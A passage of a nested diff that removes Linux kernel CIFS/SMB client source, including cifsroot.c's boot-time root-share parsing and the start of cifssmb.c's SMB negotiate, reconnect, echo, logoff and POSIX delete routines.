+-bool is_server_using_iface(struct TCP_Server_Info *server,
+-			   struct cifs_server_iface *iface);
+-bool is_ses_using_iface(struct cifs_ses *ses, struct cifs_server_iface *iface);
+-void cifs_ses_mark_for_reconnect(struct cifs_ses *ses);
+-
+-unsigned int
+-cifs_ses_get_chan_index(struct cifs_ses *ses,
+-			struct TCP_Server_Info *server);
+-void
+-cifs_chan_set_in_reconnect(struct cifs_ses *ses,
+-			     struct TCP_Server_Info *server);
+-void
+-cifs_chan_clear_in_reconnect(struct cifs_ses *ses,
+-			       struct TCP_Server_Info *server);
+-bool
+-cifs_chan_in_reconnect(struct cifs_ses *ses,
+-			  struct TCP_Server_Info *server);
+-void
+-cifs_chan_set_need_reconnect(struct cifs_ses *ses,
+-			     struct TCP_Server_Info *server);
+-void
+-cifs_chan_clear_need_reconnect(struct cifs_ses *ses,
+-			       struct TCP_Server_Info *server);
+-bool
+-cifs_chan_needs_reconnect(struct cifs_ses *ses,
+-			  struct TCP_Server_Info *server);
+-bool
+-cifs_chan_is_iface_active(struct cifs_ses *ses,
+-			  struct TCP_Server_Info *server);
+-int
+-cifs_chan_update_iface(struct cifs_ses *ses, struct TCP_Server_Info *server);
+-int
+-SMB3_request_interfaces(const unsigned int xid, struct cifs_tcon *tcon, bool in_mount);
+-
+-void extract_unc_hostname(const char *unc, const char **h, size_t *len);
+-int copy_path_name(char *dst, const char *src);
+-int smb2_parse_query_directory(struct cifs_tcon *tcon, struct kvec *rsp_iov,
+-			       int resp_buftype,
+-			       struct cifs_search_info *srch_inf);
+-
+-struct super_block *cifs_get_tcp_super(struct TCP_Server_Info *server);
+-void cifs_put_tcp_super(struct super_block *sb);
+-int cifs_update_super_prepath(struct cifs_sb_info *cifs_sb, char *prefix);
+-char *extract_hostname(const char *unc);
+-char *extract_sharename(const char *unc);
+-
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-static inline int get_dfs_path(const unsigned int xid, struct cifs_ses *ses,
+-			       const char *old_path,
+-			       const struct nls_table *nls_codepage,
+-			       struct dfs_info3_param *referral, int remap)
+-{
+-	return dfs_cache_find(xid, ses, nls_codepage, remap, old_path,
+-			      referral, NULL);
+-}
+-
+-int match_target_ip(struct TCP_Server_Info *server,
+-		    const char *share, size_t share_len,
+-		    bool *result);
+-int cifs_inval_name_dfs_link_error(const unsigned int xid,
+-				   struct cifs_tcon *tcon,
+-				   struct cifs_sb_info *cifs_sb,
+-				   const char *full_path,
+-				   bool *islink);
+-#else
+-static inline int cifs_inval_name_dfs_link_error(const unsigned int xid,
+-				   struct cifs_tcon *tcon,
+-				   struct cifs_sb_info *cifs_sb,
+-				   const char *full_path,
+-				   bool *islink)
+-{
+-	*islink = false;
+-	return 0;
+-}
+-#endif
+-
+-static inline int cifs_create_options(struct cifs_sb_info *cifs_sb, int options)
+-{
+-	if (cifs_sb && (backup_cred(cifs_sb)))
+-		return options | CREATE_OPEN_BACKUP_INTENT;
+-	else
+-		return options;
+-}
+-
+-struct super_block *cifs_get_tcon_super(struct cifs_tcon *tcon);
+-void cifs_put_tcon_super(struct super_block *sb);
+-int cifs_wait_for_server_reconnect(struct TCP_Server_Info *server, bool retry);
+-
+-#endif			/* _CIFSPROTO_H */
+diff --git a/fs/cifs/cifsroot.c b/fs/cifs/cifsroot.c
+deleted file mode 100644
+index 56ec1b233f52e..0000000000000
+--- a/fs/cifs/cifsroot.c
++++ /dev/null
+@@ -1,94 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0
+-/*
+- * SMB root file system support
+- *
+- * Copyright (c) 2019 Paulo Alcantara <palcantara@suse.de>
+- */
+-#include <linux/init.h>
+-#include <linux/fs.h>
+-#include <linux/types.h>
+-#include <linux/ctype.h>
+-#include <linux/string.h>
+-#include <linux/root_dev.h>
+-#include <linux/kernel.h>
+-#include <linux/in.h>
+-#include <linux/inet.h>
+-#include <net/ipconfig.h>
+-
+-#define DEFAULT_MNT_OPTS \
+-	"vers=1.0,cifsacl,mfsymlinks,rsize=1048576,wsize=65536,uid=0,gid=0," \
+-	"hard,rootfs"
+-
+-static char root_dev[2048] __initdata = "";
+-static char root_opts[1024] __initdata = DEFAULT_MNT_OPTS;
+-
+-static __be32 __init parse_srvaddr(char *start, char *end)
+-{
+-	/* TODO: ipv6 support */
+-	char addr[sizeof("aaa.bbb.ccc.ddd")];
+-	int i = 0;
+-
+-	while (start < end && i < sizeof(addr) - 1) {
+-		if (isdigit(*start) || *start == '.')
+-			addr[i++] = *start;
+-		start++;
+-	}
+-	addr[i] = '\0';
+-	return in_aton(addr);
+-}
+-
+-/* cifsroot=//<server-ip>/<share>[,options] */
+-static int __init cifs_root_setup(char *line)
+-{
+-	char *s;
+-	int len;
+-	__be32 srvaddr = htonl(INADDR_NONE);
+-
+-	ROOT_DEV = Root_CIFS;
+-
+-	if (strlen(line) > 3 && line[0] == '/' && line[1] == '/') {
+-		s = strchr(&line[2], '/');
+-		if (!s || s[1] == '\0')
+-			return 1;
+-
+-		/* make s point to ',' or '\0' at end of line */
+-		s = strchrnul(s, ',');
+-		/* len is strlen(unc) + '\0' */
+-		len = s - line + 1;
+-		if (len > sizeof(root_dev)) {
+-			pr_err("Root-CIFS: UNC path too long\n");
+-			return 1;
+-		}
+-		strscpy(root_dev, line, len);
+-		srvaddr = parse_srvaddr(&line[2], s);
+-		if (*s) {
+-			int n = snprintf(root_opts,
+-					 sizeof(root_opts), "%s,%s",
+-					 DEFAULT_MNT_OPTS, s + 1);
+-			if (n >= sizeof(root_opts)) {
+-				pr_err("Root-CIFS: mount options string too long\n");
+-				root_opts[sizeof(root_opts)-1] = '\0';
+-				return 1;
+-			}
+-		}
+-	}
+-
+-	root_server_addr = srvaddr;
+-
+-	return 1;
+-}
+-
+-__setup("cifsroot=", cifs_root_setup);
+-
+-int __init cifs_root_data(char **dev, char **opts)
+-{
+-	if (!root_dev[0] || root_server_addr == htonl(INADDR_NONE)) {
+-		pr_err("Root-CIFS: no SMB server address\n");
+-		return -1;
+-	}
+-
+-	*dev = root_dev;
+-	*opts = root_opts;
+-
+-	return 0;
+-}
+diff --git a/fs/cifs/cifssmb.c b/fs/cifs/cifssmb.c
+deleted file mode 100644
+index c90d4ec9292ca..0000000000000
+--- a/fs/cifs/cifssmb.c
++++ /dev/null
+@@ -1,5873 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   Copyright (C) International Business Machines  Corp., 2002,2010
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- *   Contains the routines for constructing the SMB PDUs themselves
+- *
+- */
+-
+- /* SMB/CIFS PDU handling routines here - except for leftovers in connect.c   */
+- /* These are mostly routines that operate on a pathname, or on a tree id     */
+- /* (mounted volume), but there are eight handle based routines which must be */
+- /* treated slightly differently for reconnection purposes since we never     */
+- /* want to reuse a stale file handle and only the caller knows the file info */
+-
+-#include <linux/fs.h>
+-#include <linux/kernel.h>
+-#include <linux/vfs.h>
+-#include <linux/slab.h>
+-#include <linux/posix_acl_xattr.h>
+-#include <linux/pagemap.h>
+-#include <linux/swap.h>
+-#include <linux/task_io_accounting_ops.h>
+-#include <linux/uaccess.h>
+-#include "cifspdu.h"
+-#include "cifsglob.h"
+-#include "cifsacl.h"
+-#include "cifsproto.h"
+-#include "cifs_unicode.h"
+-#include "cifs_debug.h"
+-#include "fscache.h"
+-#include "smbdirect.h"
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-#include "dfs_cache.h"
+-#endif
+-
+-#ifdef CONFIG_CIFS_POSIX
+-static struct {
+-	int index;
+-	char *name;
+-} protocols[] = {
+-	{CIFS_PROT, "\2NT LM 0.12"},
+-	{POSIX_PROT, "\2POSIX 2"},
+-	{BAD_PROT, "\2"}
+-};
+-#else
+-static struct {
+-	int index;
+-	char *name;
+-} protocols[] = {
+-	{CIFS_PROT, "\2NT LM 0.12"},
+-	{BAD_PROT, "\2"}
+-};
+-#endif
+-
+-/* define the number of elements in the cifs dialect array */
+-#ifdef CONFIG_CIFS_POSIX
+-#define CIFS_NUM_PROT 2
+-#else /* not posix */
+-#define CIFS_NUM_PROT 1
+-#endif /* CIFS_POSIX */
+-
+-
+-/* reconnect the socket, tcon, and smb session if needed */
+-static int
+-cifs_reconnect_tcon(struct cifs_tcon *tcon, int smb_command)
+-{
+-	int rc;
+-	struct cifs_ses *ses;
+-	struct TCP_Server_Info *server;
+-	struct nls_table *nls_codepage;
+-
+-	/*
+-	 * SMBs NegProt, SessSetup, uLogoff do not have tcon yet so check for
+-	 * tcp and smb session status done differently for those three - in the
+-	 * calling routine
+-	 */
+-	if (!tcon)
+-		return 0;
+-
+-	ses = tcon->ses;
+-	server = ses->server;
+-
+-	/*
+-	 * only tree disconnect, open, and write, (and ulogoff which does not
+-	 * have tcon) are allowed as we start umount
+-	 */
+-	spin_lock(&tcon->tc_lock);
+-	if (tcon->status == TID_EXITING) {
+-		if (smb_command != SMB_COM_TREE_DISCONNECT) {
+-			spin_unlock(&tcon->tc_lock);
+-			cifs_dbg(FYI, "can not send cmd %d while umounting\n",
+-				 smb_command);
+-			return -ENODEV;
+-		}
+-	}
+-	spin_unlock(&tcon->tc_lock);
+-
+-	rc = cifs_wait_for_server_reconnect(server, tcon->retry);
+-	if (rc)
+-		return rc;
+-
+-	spin_lock(&ses->chan_lock);
+-	if (!cifs_chan_needs_reconnect(ses, server) && !tcon->need_reconnect) {
+-		spin_unlock(&ses->chan_lock);
+-		return 0;
+-	}
+-	spin_unlock(&ses->chan_lock);
+-
+-	nls_codepage = load_nls_default();
+-
+-	/*
+-	 * Recheck after acquire mutex. If another thread is negotiating
+-	 * and the server never sends an answer the socket will be closed
+-	 * and tcpStatus set to reconnect.
+-	 */
+-	spin_lock(&server->srv_lock);
+-	if (server->tcpStatus == CifsNeedReconnect) {
+-		spin_unlock(&server->srv_lock);
+-		rc = -EHOSTDOWN;
+-		goto out;
+-	}
+-	spin_unlock(&server->srv_lock);
+-
+-	/*
+-	 * need to prevent multiple threads trying to simultaneously
+-	 * reconnect the same SMB session
+-	 */
+-	spin_lock(&ses->chan_lock);
+-	if (!cifs_chan_needs_reconnect(ses, server)) {
+-		spin_unlock(&ses->chan_lock);
+-
+-		/* this means that we only need to tree connect */
+-		if (tcon->need_reconnect)
+-			goto skip_sess_setup;
+-
+-		rc = -EHOSTDOWN;
+-		goto out;
+-	}
+-	spin_unlock(&ses->chan_lock);
+-
+-	mutex_lock(&ses->session_mutex);
+-	rc = cifs_negotiate_protocol(0, ses, server);
+-	if (!rc)
+-		rc = cifs_setup_session(0, ses, server, nls_codepage);
+-
+-	/* do we need to reconnect tcon? */
+-	if (rc || !tcon->need_reconnect) {
+-		mutex_unlock(&ses->session_mutex);
+-		goto out;
+-	}
+-
+-skip_sess_setup:
+-	cifs_mark_open_files_invalid(tcon);
+-	rc = cifs_tree_connect(0, tcon, nls_codepage);
+-	mutex_unlock(&ses->session_mutex);
+-	cifs_dbg(FYI, "reconnect tcon rc = %d\n", rc);
+-
+-	if (rc) {
+-		pr_warn_once("reconnect tcon failed rc = %d\n", rc);
+-		goto out;
+-	}
+-
+-	atomic_inc(&tconInfoReconnectCount);
+-
+-	/* tell server Unix caps we support */
+-	if (cap_unix(ses))
+-		reset_cifs_unix_caps(0, tcon, NULL, NULL);
+-
+-	/*
+-	 * Removed call to reopen open files here. It is safer (and faster) to
+-	 * reopen files one at a time as needed in read and write.
+-	 *
+-	 * FIXME: what about file locks? don't we need to reclaim them ASAP?
+-	 */
+-
+-out:
+-	/*
+-	 * Check if handle based operation so we know whether we can continue
+-	 * or not without returning to caller to reset file handle
+-	 */
+-	switch (smb_command) {
+-	case SMB_COM_READ_ANDX:
+-	case SMB_COM_WRITE_ANDX:
+-	case SMB_COM_CLOSE:
+-	case SMB_COM_FIND_CLOSE2:
+-	case SMB_COM_LOCKING_ANDX:
+-		rc = -EAGAIN;
+-	}
+-
+-	unload_nls(nls_codepage);
+-	return rc;
+-}
+-
+-/* Allocate and return pointer to an SMB request buffer, and set basic
+-   SMB information in the SMB header.  If the return code is zero, this
+-   function must have filled in request_buf pointer */
+-static int
+-small_smb_init(int smb_command, int wct, struct cifs_tcon *tcon,
+-		void **request_buf)
+-{
+-	int rc;
+-
+-	rc = cifs_reconnect_tcon(tcon, smb_command);
+-	if (rc)
+-		return rc;
+-
+-	*request_buf = cifs_small_buf_get();
+-	if (*request_buf == NULL) {
+-		/* BB should we add a retry in here if not a writepage? */
+-		return -ENOMEM;
+-	}
+-
+-	header_assemble((struct smb_hdr *) *request_buf, smb_command,
+-			tcon, wct);
+-
+-	if (tcon != NULL)
+-		cifs_stats_inc(&tcon->num_smbs_sent);
+-
+-	return 0;
+-}
+-
+-int
+-small_smb_init_no_tc(const int smb_command, const int wct,
+-		     struct cifs_ses *ses, void **request_buf)
+-{
+-	int rc;
+-	struct smb_hdr *buffer;
+-
+-	rc = small_smb_init(smb_command, wct, NULL, request_buf);
+-	if (rc)
+-		return rc;
+-
+-	buffer = (struct smb_hdr *)*request_buf;
+-	buffer->Mid = get_next_mid(ses->server);
+-	if (ses->capabilities & CAP_UNICODE)
+-		buffer->Flags2 |= SMBFLG2_UNICODE;
+-	if (ses->capabilities & CAP_STATUS32)
+-		buffer->Flags2 |= SMBFLG2_ERR_STATUS;
+-
+-	/* uid, tid can stay at zero as set in header assemble */
+-
+-	/* BB add support for turning on the signing when
+-	this function is used after 1st of session setup requests */
+-
+-	return rc;
+-}
+-
+-/* If the return code is zero, this function must fill in request_buf pointer */
+-static int
+-__smb_init(int smb_command, int wct, struct cifs_tcon *tcon,
+-			void **request_buf, void **response_buf)
+-{
+-	*request_buf = cifs_buf_get();
+-	if (*request_buf == NULL) {
+-		/* BB should we add a retry in here if not a writepage? */
+-		return -ENOMEM;
+-	}
+-    /* Although the original thought was we needed the response buf for  */
+-    /* potential retries of smb operations it turns out we can determine */
+-    /* from the mid flags when the request buffer can be resent without  */
+-    /* having to use a second distinct buffer for the response */
+-	if (response_buf)
+-		*response_buf = *request_buf;
+-
+-	header_assemble((struct smb_hdr *) *request_buf, smb_command, tcon,
+-			wct);
+-
+-	if (tcon != NULL)
+-		cifs_stats_inc(&tcon->num_smbs_sent);
+-
+-	return 0;
+-}
+-
+-/* If the return code is zero, this function must fill in request_buf pointer */
+-static int
+-smb_init(int smb_command, int wct, struct cifs_tcon *tcon,
+-	 void **request_buf, void **response_buf)
+-{
+-	int rc;
+-
+-	rc = cifs_reconnect_tcon(tcon, smb_command);
+-	if (rc)
+-		return rc;
+-
+-	return __smb_init(smb_command, wct, tcon, request_buf, response_buf);
+-}
+-
+-static int
+-smb_init_no_reconnect(int smb_command, int wct, struct cifs_tcon *tcon,
+-			void **request_buf, void **response_buf)
+-{
+-	spin_lock(&tcon->ses->chan_lock);
+-	if (cifs_chan_needs_reconnect(tcon->ses, tcon->ses->server) ||
+-	    tcon->need_reconnect) {
+-		spin_unlock(&tcon->ses->chan_lock);
+-		return -EHOSTDOWN;
+-	}
+-	spin_unlock(&tcon->ses->chan_lock);
+-
+-	return __smb_init(smb_command, wct, tcon, request_buf, response_buf);
+-}
+-
+-static int validate_t2(struct smb_t2_rsp *pSMB)
+-{
+-	unsigned int total_size;
+-
+-	/* check for plausible wct */
+-	if (pSMB->hdr.WordCount < 10)
+-		goto vt2_err;
+-
+-	/* check for parm and data offset going beyond end of smb */
+-	if (get_unaligned_le16(&pSMB->t2_rsp.ParameterOffset) > 1024 ||
+-	    get_unaligned_le16(&pSMB->t2_rsp.DataOffset) > 1024)
+-		goto vt2_err;
+-
+-	total_size = get_unaligned_le16(&pSMB->t2_rsp.ParameterCount);
+-	if (total_size >= 512)
+-		goto vt2_err;
+-
+-	/* check that bcc is at least as big as parms + data, and that it is
+-	 * less than negotiated smb buffer
+-	 */
+-	total_size += get_unaligned_le16(&pSMB->t2_rsp.DataCount);
+-	if (total_size > get_bcc(&pSMB->hdr) ||
+-	    total_size >= CIFSMaxBufSize + MAX_CIFS_HDR_SIZE)
+-		goto vt2_err;
+-
+-	return 0;
+-vt2_err:
+-	cifs_dump_mem("Invalid transact2 SMB: ", (char *)pSMB,
+-		sizeof(struct smb_t2_rsp) + 16);
+-	return -EINVAL;
+-}
+-
+-static int
+-decode_ext_sec_blob(struct cifs_ses *ses, NEGOTIATE_RSP *pSMBr)
+-{
+-	int	rc = 0;
+-	u16	count;
+-	char	*guid = pSMBr->u.extended_response.GUID;
+-	struct TCP_Server_Info *server = ses->server;
+-
+-	count = get_bcc(&pSMBr->hdr);
+-	if (count < SMB1_CLIENT_GUID_SIZE)
+-		return -EIO;
+-
+-	spin_lock(&cifs_tcp_ses_lock);
+-	if (server->srv_count > 1) {
+-		spin_unlock(&cifs_tcp_ses_lock);
+-		if (memcmp(server->server_GUID, guid, SMB1_CLIENT_GUID_SIZE) != 0) {
+-			cifs_dbg(FYI, "server UID changed\n");
+-			memcpy(server->server_GUID, guid, SMB1_CLIENT_GUID_SIZE);
+-		}
+-	} else {
+-		spin_unlock(&cifs_tcp_ses_lock);
+-		memcpy(server->server_GUID, guid, SMB1_CLIENT_GUID_SIZE);
+-	}
+-
+-	if (count == SMB1_CLIENT_GUID_SIZE) {
+-		server->sec_ntlmssp = true;
+-	} else {
+-		count -= SMB1_CLIENT_GUID_SIZE;
+-		rc = decode_negTokenInit(
+-			pSMBr->u.extended_response.SecurityBlob, count, server);
+-		if (rc != 1)
+-			return -EINVAL;
+-	}
+-
+-	return 0;
+-}
+-
+-static bool
+-should_set_ext_sec_flag(enum securityEnum sectype)
+-{
+-	switch (sectype) {
+-	case RawNTLMSSP:
+-	case Kerberos:
+-		return true;
+-	case Unspecified:
+-		if (global_secflags &
+-		    (CIFSSEC_MAY_KRB5 | CIFSSEC_MAY_NTLMSSP))
+-			return true;
+-		fallthrough;
+-	default:
+-		return false;
+-	}
+-}
+-
+-int
+-CIFSSMBNegotiate(const unsigned int xid,
+-		 struct cifs_ses *ses,
+-		 struct TCP_Server_Info *server)
+-{
+-	NEGOTIATE_REQ *pSMB;
+-	NEGOTIATE_RSP *pSMBr;
+-	int rc = 0;
+-	int bytes_returned;
+-	int i;
+-	u16 count;
+-
+-	if (!server) {
+-		WARN(1, "%s: server is NULL!\n", __func__);
+-		return -EIO;
+-	}
+-
+-	rc = smb_init(SMB_COM_NEGOTIATE, 0, NULL /* no tcon yet */ ,
+-		      (void **) &pSMB, (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	pSMB->hdr.Mid = get_next_mid(server);
+-	pSMB->hdr.Flags2 |= (SMBFLG2_UNICODE | SMBFLG2_ERR_STATUS);
+-
+-	if (should_set_ext_sec_flag(ses->sectype)) {
+-		cifs_dbg(FYI, "Requesting extended security\n");
+-		pSMB->hdr.Flags2 |= SMBFLG2_EXT_SEC;
+-	}
+-
+-	count = 0;
+-	/*
+-	 * We know that all the name entries in the protocols array
+-	 * are short (< 16 bytes anyway) and are NUL terminated.
+-	 */
+-	for (i = 0; i < CIFS_NUM_PROT; i++) {
+-		size_t len = strlen(protocols[i].name) + 1;
+-
+-		memcpy(&pSMB->DialectsArray[count], protocols[i].name, len);
+-		count += len;
+-	}
+-	inc_rfc1001_len(pSMB, count);
+-	pSMB->ByteCount = cpu_to_le16(count);
+-
+-	rc = SendReceive(xid, ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc != 0)
+-		goto neg_err_exit;
+-
+-	server->dialect = le16_to_cpu(pSMBr->DialectIndex);
+-	cifs_dbg(FYI, "Dialect: %d\n", server->dialect);
+-	/* Check wct = 1 error case */
+-	if ((pSMBr->hdr.WordCount <= 13) || (server->dialect == BAD_PROT)) {
+-		/* core returns wct = 1, but we do not ask for core - otherwise
+-		small wct just comes when dialect index is -1 indicating we
+-		could not negotiate a common dialect */
+-		rc = -EOPNOTSUPP;
+-		goto neg_err_exit;
+-	} else if (pSMBr->hdr.WordCount != 17) {
+-		/* unknown wct */
+-		rc = -EOPNOTSUPP;
+-		goto neg_err_exit;
+-	}
+-	/* else wct == 17, NTLM or better */
+-
+-	server->sec_mode = pSMBr->SecurityMode;
+-	if ((server->sec_mode & SECMODE_USER) == 0)
+-		cifs_dbg(FYI, "share mode security\n");
+-
+-	/* one byte, so no need to convert this or EncryptionKeyLen from
+-	   little endian */
+-	server->maxReq = min_t(unsigned int, le16_to_cpu(pSMBr->MaxMpxCount),
+-			       cifs_max_pending);
+-	set_credits(server, server->maxReq);
+-	/* probably no need to store and check maxvcs */
+-	server->maxBuf = le32_to_cpu(pSMBr->MaxBufferSize);
+-	/* set up max_read for readahead check */
+-	server->max_read = server->maxBuf;
+-	server->max_rw = le32_to_cpu(pSMBr->MaxRawSize);
+-	cifs_dbg(NOISY, "Max buf = %d\n", ses->server->maxBuf);
+-	server->capabilities = le32_to_cpu(pSMBr->Capabilities);
+-	server->timeAdj = (int)(__s16)le16_to_cpu(pSMBr->ServerTimeZone);
+-	server->timeAdj *= 60;
+-
+-	if (pSMBr->EncryptionKeyLength == CIFS_CRYPTO_KEY_SIZE) {
+-		server->negflavor = CIFS_NEGFLAVOR_UNENCAP;
+-		memcpy(ses->server->cryptkey, pSMBr->u.EncryptionKey,
+-		       CIFS_CRYPTO_KEY_SIZE);
+-	} else if (pSMBr->hdr.Flags2 & SMBFLG2_EXT_SEC ||
+-			server->capabilities & CAP_EXTENDED_SECURITY) {
+-		server->negflavor = CIFS_NEGFLAVOR_EXTENDED;
+-		rc = decode_ext_sec_blob(ses, pSMBr);
+-	} else if (server->sec_mode & SECMODE_PW_ENCRYPT) {
+-		rc = -EIO; /* no crypt key only if plain text pwd */
+-	} else {
+-		server->negflavor = CIFS_NEGFLAVOR_UNENCAP;
+-		server->capabilities &= ~CAP_EXTENDED_SECURITY;
+-	}
+-
+-	if (!rc)
+-		rc = cifs_enable_signing(server, ses->sign);
+-neg_err_exit:
+-	cifs_buf_release(pSMB);
+-
+-	cifs_dbg(FYI, "negprot rc %d\n", rc);
+-	return rc;
+-}
+-
+-int
+-CIFSSMBTDis(const unsigned int xid, struct cifs_tcon *tcon)
+-{
+-	struct smb_hdr *smb_buffer;
+-	int rc = 0;
+-
+-	cifs_dbg(FYI, "In tree disconnect\n");
+-
+-	/* BB: do we need to check this? These should never be NULL. */
+-	if ((tcon->ses == NULL) || (tcon->ses->server == NULL))
+-		return -EIO;
+-
+-	/*
+-	 * No need to return error on this operation if tid invalidated and
+-	 * closed on server already e.g. due to tcp session crashing. Also,
+-	 * the tcon is no longer on the list, so no need to take lock before
+-	 * checking this.
+-	 */
+-	spin_lock(&tcon->ses->chan_lock);
+-	if ((tcon->need_reconnect) || CIFS_ALL_CHANS_NEED_RECONNECT(tcon->ses)) {
+-		spin_unlock(&tcon->ses->chan_lock);
+-		return -EIO;
+-	}
+-	spin_unlock(&tcon->ses->chan_lock);
+-
+-	rc = small_smb_init(SMB_COM_TREE_DISCONNECT, 0, tcon,
+-			    (void **)&smb_buffer);
+-	if (rc)
+-		return rc;
+-
+-	rc = SendReceiveNoRsp(xid, tcon->ses, (char *)smb_buffer, 0);
+-	cifs_small_buf_release(smb_buffer);
+-	if (rc)
+-		cifs_dbg(FYI, "Tree disconnect failed %d\n", rc);
+-
+-	/* No need to return error on this operation if tid invalidated and
+-	   closed on server already e.g. due to tcp session crashing */
+-	if (rc == -EAGAIN)
+-		rc = 0;
+-
+-	return rc;
+-}
+-
+-/*
+- * This is a no-op for now. We're not really interested in the reply, but
+- * rather in the fact that the server sent one and that server->lstrp
+- * gets updated.
+- *
+- * FIXME: maybe we should consider checking that the reply matches request?
+- */
+-static void
+-cifs_echo_callback(struct mid_q_entry *mid)
+-{
+-	struct TCP_Server_Info *server = mid->callback_data;
+-	struct cifs_credits credits = { .value = 1, .instance = 0 };
+-
+-	release_mid(mid);
+-	add_credits(server, &credits, CIFS_ECHO_OP);
+-}
+-
+-int
+-CIFSSMBEcho(struct TCP_Server_Info *server)
+-{
+-	ECHO_REQ *smb;
+-	int rc = 0;
+-	struct kvec iov[2];
+-	struct smb_rqst rqst = { .rq_iov = iov,
+-				 .rq_nvec = 2 };
+-
+-	cifs_dbg(FYI, "In echo request\n");
+-
+-	rc = small_smb_init(SMB_COM_ECHO, 0, NULL, (void **)&smb);
+-	if (rc)
+-		return rc;
+-
+-	if (server->capabilities & CAP_UNICODE)
+-		smb->hdr.Flags2 |= SMBFLG2_UNICODE;
+-
+-	/* set up echo request */
+-	smb->hdr.Tid = 0xffff;
+-	smb->hdr.WordCount = 1;
+-	put_unaligned_le16(1, &smb->EchoCount);
+-	put_bcc(1, &smb->hdr);
+-	smb->Data[0] = 'a';
+-	inc_rfc1001_len(smb, 3);
+-
+-	iov[0].iov_len = 4;
+-	iov[0].iov_base = smb;
+-	iov[1].iov_len = get_rfc1002_length(smb);
+-	iov[1].iov_base = (char *)smb + 4;
+-
+-	rc = cifs_call_async(server, &rqst, NULL, cifs_echo_callback, NULL,
+-			     server, CIFS_NON_BLOCKING | CIFS_ECHO_OP, NULL);
+-	if (rc)
+-		cifs_dbg(FYI, "Echo request failed: %d\n", rc);
+-
+-	cifs_small_buf_release(smb);
+-
+-	return rc;
+-}
+-
+-int
+-CIFSSMBLogoff(const unsigned int xid, struct cifs_ses *ses)
+-{
+-	LOGOFF_ANDX_REQ *pSMB;
+-	int rc = 0;
+-
+-	cifs_dbg(FYI, "In SMBLogoff for session disconnect\n");
+-
+-	/*
+-	 * BB: do we need to check validity of ses and server? They should
+-	 * always be valid since we have an active reference. If not, that
+-	 * should probably be a BUG()
+-	 */
+-	if (!ses || !ses->server)
+-		return -EIO;
+-
+-	mutex_lock(&ses->session_mutex);
+-	spin_lock(&ses->chan_lock);
+-	if (CIFS_ALL_CHANS_NEED_RECONNECT(ses)) {
+-		spin_unlock(&ses->chan_lock);
+-		goto session_already_dead; /* no need to send SMBlogoff if uid
+-					      already closed due to reconnect */
+-	}
+-	spin_unlock(&ses->chan_lock);
+-
+-	rc = small_smb_init(SMB_COM_LOGOFF_ANDX, 2, NULL, (void **)&pSMB);
+-	if (rc) {
+-		mutex_unlock(&ses->session_mutex);
+-		return rc;
+-	}
+-
+-	pSMB->hdr.Mid = get_next_mid(ses->server);
+-
+-	if (ses->server->sign)
+-		pSMB->hdr.Flags2 |= SMBFLG2_SECURITY_SIGNATURE;
+-
+-	pSMB->hdr.Uid = ses->Suid;
+-
+-	pSMB->AndXCommand = 0xFF;
+-	rc = SendReceiveNoRsp(xid, ses, (char *) pSMB, 0);
+-	cifs_small_buf_release(pSMB);
+-session_already_dead:
+-	mutex_unlock(&ses->session_mutex);
+-
+-	/* if session dead then we do not need to do ulogoff,
+-		since server closed smb session, no sense reporting
+-		error */
+-	if (rc == -EAGAIN)
+-		rc = 0;
+-	return rc;
+-}
+-
+-int
+-CIFSPOSIXDelFile(const unsigned int xid, struct cifs_tcon *tcon,
+-		 const char *fileName, __u16 type,
+-		 const struct nls_table *nls_codepage, int remap)
+-{
+-	TRANSACTION2_SPI_REQ *pSMB = NULL;
+-	TRANSACTION2_SPI_RSP *pSMBr = NULL;
+-	struct unlink_psx_rq *pRqD;
+-	int name_len;
+-	int rc = 0;
+-	int bytes_returned = 0;
+-	__u16 params, param_offset, offset, byte_count;
+-
+-	cifs_dbg(FYI, "In POSIX delete\n");
+-PsxDelete:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len =
+-		    cifsConvertToUTF16((__le16 *) pSMB->FileName, fileName,
+-				       PATH_MAX, nls_codepage, remap);
+-		name_len++;	/* trailing null */
+-		name_len *= 2;
+-	} else {
+-		name_len = copy_path_name(pSMB->FileName, fileName);
+-	}
+-
+-	params = 6 + name_len;
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	pSMB->MaxDataCount = 0; /* BB double check this with jra */
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	param_offset = offsetof(struct smb_com_transaction2_spi_req,
+-				InformationLevel) - 4;
+-	offset = param_offset + params;
+-
+-	/* Setup pointer to Request Data (inode type).
+-	 * Note that SMB offsets are from the beginning of SMB which is 4 bytes
+-	 * in, after RFC1001 field
+-	 */
+-	pRqD = (struct unlink_psx_rq *)((char *)(pSMB) + offset + 4);
+-	pRqD->type = cpu_to_le16(type);
+-	pSMB->ParameterOffset = cpu_to_le16(param_offset);
+-	pSMB->DataOffset = cpu_to_le16(offset);
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_PATH_INFORMATION);
+-	byte_count = 3 /* pad */  + params + sizeof(struct unlink_psx_rq);
+-
+-	pSMB->DataCount = cpu_to_le16(sizeof(struct unlink_psx_rq));
+-	pSMB->TotalDataCount = cpu_to_le16(sizeof(struct unlink_psx_rq));
+-	pSMB->ParameterCount = cpu_to_le16(params);
+-	pSMB->TotalParameterCount = pSMB->ParameterCount;
+-	pSMB->InformationLevel = cpu_to_le16(SMB_POSIX_UNLINK);
+-	pSMB->Reserved4 = 0;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc)
+-		cifs_dbg(FYI, "Posix delete returned %d\n", rc);
+-	cifs_buf_release(pSMB);
+-
